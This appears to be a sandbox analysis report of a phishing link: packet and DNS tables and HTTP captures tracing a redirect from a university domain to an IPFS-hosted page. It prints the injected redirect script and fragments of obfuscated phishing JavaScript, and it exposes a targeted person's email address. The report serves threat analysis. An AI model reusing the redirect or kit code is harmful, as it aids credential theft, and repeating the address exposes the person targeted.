                            Jan 7, 2025 18:46:41.643106937 CET44349726195.35.33.215192.168.2.16
                            Jan 7, 2025 18:46:41.643146992 CET49726443192.168.2.16195.35.33.215
                            Jan 7, 2025 18:46:41.643155098 CET44349726195.35.33.215192.168.2.16
                            Jan 7, 2025 18:46:41.643184900 CET49726443192.168.2.16195.35.33.215
                            Jan 7, 2025 18:46:41.643193007 CET49726443192.168.2.16195.35.33.215
                            Jan 7, 2025 18:46:41.696929932 CET44349726195.35.33.215192.168.2.16
                            Jan 7, 2025 18:46:41.696971893 CET44349726195.35.33.215192.168.2.16
                            Jan 7, 2025 18:46:41.697007895 CET49726443192.168.2.16195.35.33.215
                            Jan 7, 2025 18:46:41.697021008 CET44349726195.35.33.215192.168.2.16
                            Jan 7, 2025 18:46:41.697066069 CET49726443192.168.2.16195.35.33.215
                            Jan 7, 2025 18:46:41.697299957 CET49726443192.168.2.16195.35.33.215
                            Jan 7, 2025 18:46:41.697319031 CET44349726195.35.33.215192.168.2.16
                            Jan 7, 2025 18:46:42.170373917 CET44349729195.35.33.215192.168.2.16
                            Jan 7, 2025 18:46:42.170691013 CET49729443192.168.2.16195.35.33.215
                            Jan 7, 2025 18:46:42.170717955 CET44349729195.35.33.215192.168.2.16
                            Jan 7, 2025 18:46:42.171022892 CET44349729195.35.33.215192.168.2.16
                            Jan 7, 2025 18:46:42.171346903 CET49729443192.168.2.16195.35.33.215
                            Jan 7, 2025 18:46:42.171399117 CET44349729195.35.33.215192.168.2.16
                            Jan 7, 2025 18:46:42.171502113 CET49729443192.168.2.16195.35.33.215
                            Jan 7, 2025 18:46:42.215327024 CET44349729195.35.33.215192.168.2.16
                            Jan 7, 2025 18:46:42.428586960 CET44349729195.35.33.215192.168.2.16
                            Jan 7, 2025 18:46:42.428756952 CET44349729195.35.33.215192.168.2.16
                            Jan 7, 2025 18:46:42.428801060 CET44349729195.35.33.215192.168.2.16
                            Jan 7, 2025 18:46:42.428834915 CET49729443192.168.2.16195.35.33.215
                            Jan 7, 2025 18:46:42.428858042 CET49729443192.168.2.16195.35.33.215
                            Jan 7, 2025 18:46:42.429486036 CET49729443192.168.2.16195.35.33.215
                            Jan 7, 2025 18:46:42.429501057 CET44349729195.35.33.215192.168.2.16
                            Jan 7, 2025 18:46:43.286408901 CET49678443192.168.2.1620.189.173.10
                            Jan 7, 2025 18:46:43.586086988 CET49678443192.168.2.1620.189.173.10
                            Jan 7, 2025 18:46:44.192106009 CET49678443192.168.2.1620.189.173.10
                            Jan 7, 2025 18:46:44.448112965 CET49673443192.168.2.16204.79.197.203
                            Jan 7, 2025 18:46:45.406095028 CET49678443192.168.2.1620.189.173.10
                            Jan 7, 2025 18:46:47.755269051 CET4968080192.168.2.16192.229.211.108
                            Jan 7, 2025 18:46:47.819094896 CET49678443192.168.2.1620.189.173.10
                            Jan 7, 2025 18:46:48.059120893 CET4968080192.168.2.16192.229.211.108
                            Jan 7, 2025 18:46:48.664159060 CET4968080192.168.2.16192.229.211.108
                            Jan 7, 2025 18:46:49.878139973 CET4968080192.168.2.16192.229.211.108
                            Jan 7, 2025 18:46:50.775780916 CET44349723142.250.185.228192.168.2.16
                            Jan 7, 2025 18:46:50.775849104 CET44349723142.250.185.228192.168.2.16
                            Jan 7, 2025 18:46:50.775913000 CET49723443192.168.2.16142.250.185.228
                            Jan 7, 2025 18:46:51.615801096 CET49723443192.168.2.16142.250.185.228
                            Jan 7, 2025 18:46:51.615839005 CET44349723142.250.185.228192.168.2.16
                            Jan 7, 2025 18:46:52.284149885 CET4968080192.168.2.16192.229.211.108
                            Jan 7, 2025 18:46:52.620265007 CET49678443192.168.2.1620.189.173.10
                            Jan 7, 2025 18:46:54.053260088 CET49673443192.168.2.16204.79.197.203
                            Jan 7, 2025 18:46:57.091264009 CET4968080192.168.2.16192.229.211.108
                            Jan 7, 2025 18:47:02.232213974 CET49678443192.168.2.1620.189.173.10
                            Jan 7, 2025 18:47:06.695247889 CET4968080192.168.2.16192.229.211.108
                            Jan 7, 2025 18:47:07.876841068 CET8049698217.20.57.34192.168.2.16
                            Jan 7, 2025 18:47:07.877063990 CET4969880192.168.2.16217.20.57.34
                            Jan 7, 2025 18:47:07.877063990 CET4969880192.168.2.16217.20.57.34
                            Jan 7, 2025 18:47:07.883481979 CET8049698217.20.57.34192.168.2.16
                            Jan 7, 2025 18:47:08.011574984 CET8049699217.20.57.34192.168.2.16
                            Jan 7, 2025 18:47:08.011734009 CET4969980192.168.2.16217.20.57.34
                            Jan 7, 2025 18:47:08.011790037 CET4969980192.168.2.16217.20.57.34
                            Jan 7, 2025 18:47:08.016619921 CET8049699217.20.57.34192.168.2.16
                            Jan 7, 2025 18:47:09.257504940 CET49732443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:09.257533073 CET4434973266.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:09.257633924 CET49732443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:09.257839918 CET49732443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:09.257852077 CET4434973266.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:09.977204084 CET4434973266.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:09.977494001 CET49732443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:09.977504969 CET4434973266.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:09.978372097 CET4434973266.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:09.978439093 CET49732443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:09.982755899 CET49732443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:09.982812881 CET4434973266.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:09.982981920 CET49732443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:09.982990980 CET4434973266.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:10.032243967 CET49732443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:10.317538023 CET4434973266.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:10.317754030 CET4434973266.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:10.317837000 CET49732443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:10.318306923 CET49732443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:10.318327904 CET4434973266.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:10.318340063 CET49732443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:10.318380117 CET49732443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:10.330277920 CET49733443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:10.330313921 CET4434973366.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:10.330399990 CET49733443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:10.336980104 CET49733443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:10.336992979 CET4434973366.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:11.052946091 CET4434973366.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:11.053201914 CET49733443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:11.053220987 CET4434973366.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:11.053518057 CET4434973366.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:11.053807020 CET49733443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:11.053858042 CET4434973366.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:11.053944111 CET49733443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:11.099327087 CET4434973366.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:12.257632017 CET49713443192.168.2.16146.190.178.79
                            Jan 7, 2025 18:47:12.299335957 CET44349713146.190.178.79192.168.2.16
                            Jan 7, 2025 18:47:12.449907064 CET44349713146.190.178.79192.168.2.16
                            Jan 7, 2025 18:47:12.449980021 CET44349713146.190.178.79192.168.2.16
                            Jan 7, 2025 18:47:12.450033903 CET49713443192.168.2.16146.190.178.79
                            Jan 7, 2025 18:47:12.450576067 CET49713443192.168.2.16146.190.178.79
                            Jan 7, 2025 18:47:12.450589895 CET44349713146.190.178.79192.168.2.16
                            Jan 7, 2025 18:47:12.553190947 CET4434973366.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:12.553260088 CET4434973366.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:12.553313971 CET49733443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:12.553733110 CET49733443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:12.553745985 CET4434973366.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:12.611916065 CET49734443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:12.611948013 CET4434973466.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:12.612026930 CET49734443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:12.612246037 CET49734443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:12.612258911 CET4434973466.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:13.199479103 CET4434973466.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:13.199768066 CET49734443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:13.199785948 CET4434973466.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:13.200649023 CET4434973466.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:13.200715065 CET49734443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:13.200998068 CET49734443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:13.201056957 CET4434973466.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:13.201138973 CET49734443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:13.201145887 CET4434973466.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:13.254260063 CET49734443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:13.434786081 CET4434973466.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:13.434835911 CET4434973466.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:13.434889078 CET49734443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:13.435383081 CET49734443192.168.2.1666.29.153.55
                            Jan 7, 2025 18:47:13.435399055 CET4434973466.29.153.55192.168.2.16
                            Jan 7, 2025 18:47:22.565361977 CET49709443192.168.2.16162.214.205.216
                            Jan 7, 2025 18:47:22.565383911 CET44349709162.214.205.216192.168.2.16
                            Jan 7, 2025 18:47:37.601936102 CET49709443192.168.2.16162.214.205.216
                            Jan 7, 2025 18:47:37.602055073 CET44349709162.214.205.216192.168.2.16
                            Jan 7, 2025 18:47:37.602134943 CET49709443192.168.2.16162.214.205.216
                            Jan 7, 2025 18:47:40.284740925 CET49737443192.168.2.16142.250.185.228
                            Jan 7, 2025 18:47:40.284790993 CET44349737142.250.185.228192.168.2.16
                            Jan 7, 2025 18:47:40.284882069 CET49737443192.168.2.16142.250.185.228
                            Jan 7, 2025 18:47:40.285182953 CET49737443192.168.2.16142.250.185.228
                            Jan 7, 2025 18:47:40.285198927 CET44349737142.250.185.228192.168.2.16
                            Jan 7, 2025 18:47:40.956862926 CET44349737142.250.185.228192.168.2.16
                            Jan 7, 2025 18:47:40.957216024 CET49737443192.168.2.16142.250.185.228
                            Jan 7, 2025 18:47:40.957237005 CET44349737142.250.185.228192.168.2.16
                            Jan 7, 2025 18:47:40.957601070 CET44349737142.250.185.228192.168.2.16
                            Jan 7, 2025 18:47:40.957911968 CET49737443192.168.2.16142.250.185.228
                            Jan 7, 2025 18:47:40.957983017 CET44349737142.250.185.228192.168.2.16
                            Jan 7, 2025 18:47:41.002484083 CET49737443192.168.2.16142.250.185.228
                            Jan 7, 2025 18:47:50.856888056 CET44349737142.250.185.228192.168.2.16
                            Jan 7, 2025 18:47:50.856944084 CET44349737142.250.185.228192.168.2.16
                            Jan 7, 2025 18:47:50.857021093 CET49737443192.168.2.16142.250.185.228
                            Jan 7, 2025 18:47:51.615354061 CET49737443192.168.2.16142.250.185.228
                            Jan 7, 2025 18:47:51.615377903 CET44349737142.250.185.228192.168.2.16
                            Jan 7, 2025 18:48:13.708985090 CET4970180192.168.2.16192.229.221.95
                            Jan 7, 2025 18:48:13.710513115 CET49700443192.168.2.1640.126.32.74
                            Jan 7, 2025 18:48:13.714103937 CET8049701192.229.221.95192.168.2.16
                            Jan 7, 2025 18:48:13.714215994 CET4970180192.168.2.16192.229.221.95
                            Jan 7, 2025 18:48:13.715384007 CET4434970040.126.32.74192.168.2.16
                            Jan 7, 2025 18:48:13.715467930 CET49700443192.168.2.1640.126.32.74
                            Jan 7, 2025 18:48:15.883830070 CET49702443192.168.2.1640.126.32.74
                            Jan 7, 2025 18:48:15.888983011 CET4434970240.126.32.74192.168.2.16
                            Jan 7, 2025 18:48:15.889055014 CET49702443192.168.2.1640.126.32.74
                            TimestampSource PortDest PortSource IPDest IP
                            Jan 7, 2025 18:46:35.366760969 CET53617931.1.1.1192.168.2.16
                            Jan 7, 2025 18:46:35.497916937 CET53504611.1.1.1192.168.2.16
                            Jan 7, 2025 18:46:36.346709013 CET6484653192.168.2.161.1.1.1
                            Jan 7, 2025 18:46:36.346950054 CET6273853192.168.2.161.1.1.1
                            Jan 7, 2025 18:46:36.475891113 CET53523721.1.1.1192.168.2.16
                            Jan 7, 2025 18:46:36.915515900 CET53627381.1.1.1192.168.2.16
                            Jan 7, 2025 18:46:36.915688038 CET53648461.1.1.1192.168.2.16
                            Jan 7, 2025 18:46:37.997837067 CET5204353192.168.2.161.1.1.1
                            Jan 7, 2025 18:46:37.997973919 CET6138753192.168.2.161.1.1.1
                            Jan 7, 2025 18:46:38.014564991 CET53520431.1.1.1192.168.2.16
                            Jan 7, 2025 18:46:38.019846916 CET53613871.1.1.1192.168.2.16
                            Jan 7, 2025 18:46:39.401650906 CET5458653192.168.2.161.1.1.1
                            Jan 7, 2025 18:46:39.401824951 CET5994053192.168.2.161.1.1.1
                            Jan 7, 2025 18:46:39.402420044 CET5960453192.168.2.161.1.1.1
                            Jan 7, 2025 18:46:39.402525902 CET5685553192.168.2.161.1.1.1
                            Jan 7, 2025 18:46:39.408937931 CET53545861.1.1.1192.168.2.16
                            Jan 7, 2025 18:46:39.409364939 CET53599401.1.1.1192.168.2.16
                            Jan 7, 2025 18:46:39.462372065 CET53596041.1.1.1192.168.2.16
                            Jan 7, 2025 18:46:39.526875019 CET53578151.1.1.1192.168.2.16
                            Jan 7, 2025 18:46:39.767781973 CET53568551.1.1.1192.168.2.16
                            Jan 7, 2025 18:46:40.219387054 CET6112153192.168.2.161.1.1.1
                            Jan 7, 2025 18:46:40.219571114 CET5723553192.168.2.161.1.1.1
                            Jan 7, 2025 18:46:40.226339102 CET53572351.1.1.1192.168.2.16
                            Jan 7, 2025 18:46:40.226464987 CET53611211.1.1.1192.168.2.16
                            Jan 7, 2025 18:46:40.296941996 CET4915253192.168.2.161.1.1.1
                            Jan 7, 2025 18:46:40.297199011 CET5582353192.168.2.161.1.1.1
                            Jan 7, 2025 18:46:40.303761005 CET53491521.1.1.1192.168.2.16
                            Jan 7, 2025 18:46:40.304461002 CET53558231.1.1.1192.168.2.16
                            Jan 7, 2025 18:46:40.336790085 CET5309853192.168.2.161.1.1.1
                            Jan 7, 2025 18:46:40.336915970 CET6166353192.168.2.161.1.1.1
                            Jan 7, 2025 18:46:40.366199017 CET53530981.1.1.1192.168.2.16
                            Jan 7, 2025 18:46:40.384713888 CET53616631.1.1.1192.168.2.16
                            Jan 7, 2025 18:46:53.503036022 CET53496041.1.1.1192.168.2.16
                            Jan 7, 2025 18:47:09.244344950 CET4942753192.168.2.161.1.1.1
                            Jan 7, 2025 18:47:09.244462967 CET5526253192.168.2.161.1.1.1
                            Jan 7, 2025 18:47:09.256843090 CET53552621.1.1.1192.168.2.16
                            Jan 7, 2025 18:47:09.257074118 CET53494271.1.1.1192.168.2.16
                            Jan 7, 2025 18:47:12.420789957 CET53640151.1.1.1192.168.2.16
                            Jan 7, 2025 18:47:12.556689024 CET6020553192.168.2.161.1.1.1
                            Jan 7, 2025 18:47:12.556860924 CET5968253192.168.2.161.1.1.1
                            Jan 7, 2025 18:47:12.568897009 CET53596821.1.1.1192.168.2.16
                            Jan 7, 2025 18:47:12.611413002 CET53602051.1.1.1192.168.2.16
                            Jan 7, 2025 18:47:35.148195028 CET53543701.1.1.1192.168.2.16
                            Jan 7, 2025 18:47:35.357234955 CET53507361.1.1.1192.168.2.16
                            Jan 7, 2025 18:47:39.442956924 CET138138192.168.2.16192.168.2.255
                            Jan 7, 2025 18:48:05.936918020 CET53547441.1.1.1192.168.2.16
                            TimestampSource IPDest IPChecksumCodeType
                            Jan 7, 2025 18:46:39.767904997 CET192.168.2.161.1.1.1c22d(Port unreachable)Destination Unreachable
                            Jan 7, 2025 18:46:40.384793043 CET192.168.2.161.1.1.1c22d(Port unreachable)Destination Unreachable
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jan 7, 2025 18:46:36.346709013 CET192.168.2.161.1.1.10x834cStandard query (0)universidad-unidem.edu.mxA (IP address)IN (0x0001)false
                            Jan 7, 2025 18:46:36.346950054 CET192.168.2.161.1.1.10x6171Standard query (0)universidad-unidem.edu.mx65IN (0x0001)false
                            Jan 7, 2025 18:46:37.997837067 CET192.168.2.161.1.1.10x513Standard query (0)bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyzA (IP address)IN (0x0001)false
                            Jan 7, 2025 18:46:37.997973919 CET192.168.2.161.1.1.10x498dStandard query (0)bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz65IN (0x0001)false
                            Jan 7, 2025 18:46:39.401650906 CET192.168.2.161.1.1.10xdf04Standard query (0)i.ibb.coA (IP address)IN (0x0001)false
                            Jan 7, 2025 18:46:39.401824951 CET192.168.2.161.1.1.10xd6eStandard query (0)i.ibb.co65IN (0x0001)false
                            Jan 7, 2025 18:46:39.402420044 CET192.168.2.161.1.1.10x1502Standard query (0)wafsd.comA (IP address)IN (0x0001)false
                            Jan 7, 2025 18:46:39.402525902 CET192.168.2.161.1.1.10xec9aStandard query (0)wafsd.com65IN (0x0001)false
                            Jan 7, 2025 18:46:40.219387054 CET192.168.2.161.1.1.10x8b98Standard query (0)www.google.comA (IP address)IN (0x0001)false
                            Jan 7, 2025 18:46:40.219571114 CET192.168.2.161.1.1.10x5817Standard query (0)www.google.com65IN (0x0001)false
                            Jan 7, 2025 18:46:40.296941996 CET192.168.2.161.1.1.10xd277Standard query (0)i.ibb.coA (IP address)IN (0x0001)false
                            Jan 7, 2025 18:46:40.297199011 CET192.168.2.161.1.1.10xa648Standard query (0)i.ibb.co65IN (0x0001)false
                            Jan 7, 2025 18:46:40.336790085 CET192.168.2.161.1.1.10x7bd2Standard query (0)wafsd.comA (IP address)IN (0x0001)false
                            Jan 7, 2025 18:46:40.336915970 CET192.168.2.161.1.1.10x8bf9Standard query (0)wafsd.com65IN (0x0001)false
                            Jan 7, 2025 18:47:09.244344950 CET192.168.2.161.1.1.10xcb67Standard query (0)xsapz.comA (IP address)IN (0x0001)false
                            Jan 7, 2025 18:47:09.244462967 CET192.168.2.161.1.1.10x5c0aStandard query (0)xsapz.com65IN (0x0001)false
                            Jan 7, 2025 18:47:12.556689024 CET192.168.2.161.1.1.10x2b79Standard query (0)xsapz.comA (IP address)IN (0x0001)false
                            Jan 7, 2025 18:47:12.556860924 CET192.168.2.161.1.1.10x5bfStandard query (0)xsapz.com65IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jan 7, 2025 18:46:36.915688038 CET1.1.1.1192.168.2.160x834cNo error (0)universidad-unidem.edu.mx162.214.205.216A (IP address)IN (0x0001)false
                            Jan 7, 2025 18:46:38.014564991 CET1.1.1.1192.168.2.160x513No error (0)bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz146.190.178.79A (IP address)IN (0x0001)false
                            Jan 7, 2025 18:46:39.408937931 CET1.1.1.1192.168.2.160xdf04No error (0)i.ibb.co91.134.9.160A (IP address)IN (0x0001)false
                            Jan 7, 2025 18:46:39.408937931 CET1.1.1.1192.168.2.160xdf04No error (0)i.ibb.co91.134.10.168A (IP address)IN (0x0001)false
                            Jan 7, 2025 18:46:39.408937931 CET1.1.1.1192.168.2.160xdf04No error (0)i.ibb.co91.134.10.182A (IP address)IN (0x0001)false
                            Jan 7, 2025 18:46:39.408937931 CET1.1.1.1192.168.2.160xdf04No error (0)i.ibb.co91.134.10.127A (IP address)IN (0x0001)false
                            Jan 7, 2025 18:46:39.408937931 CET1.1.1.1192.168.2.160xdf04No error (0)i.ibb.co91.134.82.79A (IP address)IN (0x0001)false
                            Jan 7, 2025 18:46:39.408937931 CET1.1.1.1192.168.2.160xdf04No error (0)i.ibb.co91.134.9.159A (IP address)IN (0x0001)false
                            Jan 7, 2025 18:46:39.462372065 CET1.1.1.1192.168.2.160x1502No error (0)wafsd.com195.35.33.215A (IP address)IN (0x0001)false
                            Jan 7, 2025 18:46:40.226339102 CET1.1.1.1192.168.2.160x5817No error (0)www.google.com65IN (0x0001)false
                            Jan 7, 2025 18:46:40.226464987 CET1.1.1.1192.168.2.160x8b98No error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                            Jan 7, 2025 18:46:40.303761005 CET1.1.1.1192.168.2.160xd277No error (0)i.ibb.co169.197.85.95A (IP address)IN (0x0001)false
                            Jan 7, 2025 18:46:40.366199017 CET1.1.1.1192.168.2.160x7bd2No error (0)wafsd.com195.35.33.215A (IP address)IN (0x0001)false
                            Jan 7, 2025 18:47:09.257074118 CET1.1.1.1192.168.2.160xcb67No error (0)xsapz.com66.29.153.55A (IP address)IN (0x0001)false
                            Jan 7, 2025 18:47:12.611413002 CET1.1.1.1192.168.2.160x2b79No error (0)xsapz.com66.29.153.55A (IP address)IN (0x0001)false
                            • universidad-unidem.edu.mx
                            • https:
                              • bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz
                              • i.ibb.co
                              • wafsd.com
                              • xsapz.com
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.1649708162.214.205.2164436900C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-07 17:46:37 UTC702OUTGET /mah/i/amFjb2JAc3RlaW5ib3JuLmNvbQ== HTTP/1.1
                            Host: universidad-unidem.edu.mx
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-User: ?1
                            Sec-Fetch-Dest: document
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-07 17:46:37 UTC159INHTTP/1.1 200 OK
                            Date: Tue, 07 Jan 2025 17:46:37 GMT
                            Server: Apache
                            Connection: close
                            Transfer-Encoding: chunked
                            Content-Type: text/html; charset=UTF-8
                            2025-01-07 17:46:37 UTC177INData Raw: 61 62 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 73 3a 2f 2f 62 61 66 6b 72 65 69 65 6a 33 69 34 74 78 79 34 61 35 71 36 75 6e 34 34 68 66 61 75 75 35 64 66 78 66 73 63 6f 64 61 35 65 32 6d 37 72 73 76 69 79 78 66 66 6c 70 68 76 71 67 75 2e 69 70 66 73 2e 66 6c 6b 2d 69 70 66 73 2e 78 79 7a 23 6a 61 63 6f 62 40 73 74 65 69 6e 62 6f 72 6e 2e 63 6f 6d 22 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a
                            Data Ascii: ab<script type="text/javascript">window.location.href = "https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz#jacob@steinborn.com"</script>
                            2025-01-07 17:46:37 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.1649712146.190.178.794436900C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-07 17:46:38 UTC751OUTGET / HTTP/1.1
                            Host: bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-Dest: document
                            Referer: https://universidad-unidem.edu.mx/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-07 17:46:38 UTC1105INHTTP/1.1 200 OK
                            Date: Tue, 07 Jan 2025 17:46:38 GMT
                            Content-Type: text/html
                            Content-Length: 376602
                            Connection: close
                            Accept-Ranges: bytes
                            Access-Control-Allow-Headers: Content-Type
                            Access-Control-Allow-Headers: Range
                            Access-Control-Allow-Headers: User-Agent
                            Access-Control-Allow-Headers: X-Requested-With
                            Access-Control-Allow-Methods: GET
                            Access-Control-Allow-Methods: HEAD
                            Access-Control-Allow-Methods: OPTIONS
                            Access-Control-Allow-Origin: *
                            Access-Control-Expose-Headers: Content-Length
                            Access-Control-Expose-Headers: Content-Range
                            Access-Control-Expose-Headers: X-Chunked-Output
                            Access-Control-Expose-Headers: X-Ipfs-Path
                            Access-Control-Expose-Headers: X-Ipfs-Roots
                            Access-Control-Expose-Headers: X-Stream-Output
                            Cache-Control: public, max-age=29030400, immutable
                            Etag: "bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu"
                            X-Ipfs-Path: /ipfs/bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu/
                            X-Ipfs-Roots: bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu
                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                            X-Ipfs-Pop: gateway-fra1
                            2025-01-07 17:46:38 UTC2991INData Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 3c 21 2d 2d 0d 0a 76 61 72 20 5f 30 78 34 31 37 66 30 38 3d 5f 30 78 33 65 38 30 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 32 61 34 32 64 2c 5f 30 78 31 30 32 65 62 34 29 7b 76 61 72 20 5f 30 78 32 33 39 62 61 65 3d 5f 30 78 33 65 38 30 2c 5f 30 78 34 62 39 30 64 31 3d 5f 30 78 31 32 61 34 32 64 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 31 36 39 61 63 33 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 32 33 39 62 61 65 28 30 78 35 66 66 29 29 2f 28 2d 30 78 31 35 38 2a 30 78 37 2b 2d 30 78 34 64 39 2b 30 78 32 2a 30 78 37 32 31 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 32 33 39 62 61 65 28 30 78 65 38 64 29 29 2f 28 2d 30 78 35
                            Data Ascii: <script language="javascript">...var _0x417f08=_0x3e80;(function(_0x12a42d,_0x102eb4){var _0x239bae=_0x3e80,_0x4b90d1=_0x12a42d();while(!![]){try{var _0x169ac3=-parseInt(_0x239bae(0x5ff))/(-0x158*0x7+-0x4d9+0x2*0x721)+parseInt(_0x239bae(0xe8d))/(-0x5
                            2025-01-07 17:46:38 UTC109INData Raw: 30 38 28 30 78 33 34 65 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 32 36 33 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 65 38 34 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 64 61 38 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 30 64 61 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 34 37 65 29 2b 5f 30 78 34 31 37 66 30 38
                            Data Ascii: 08(0x34e)+_0x417f08(0x1263)+_0x417f08(0x1e84)+_0x417f08(0x1da8)+_0x417f08(0x10da)+_0x417f08(0x147e)+_0x417f08
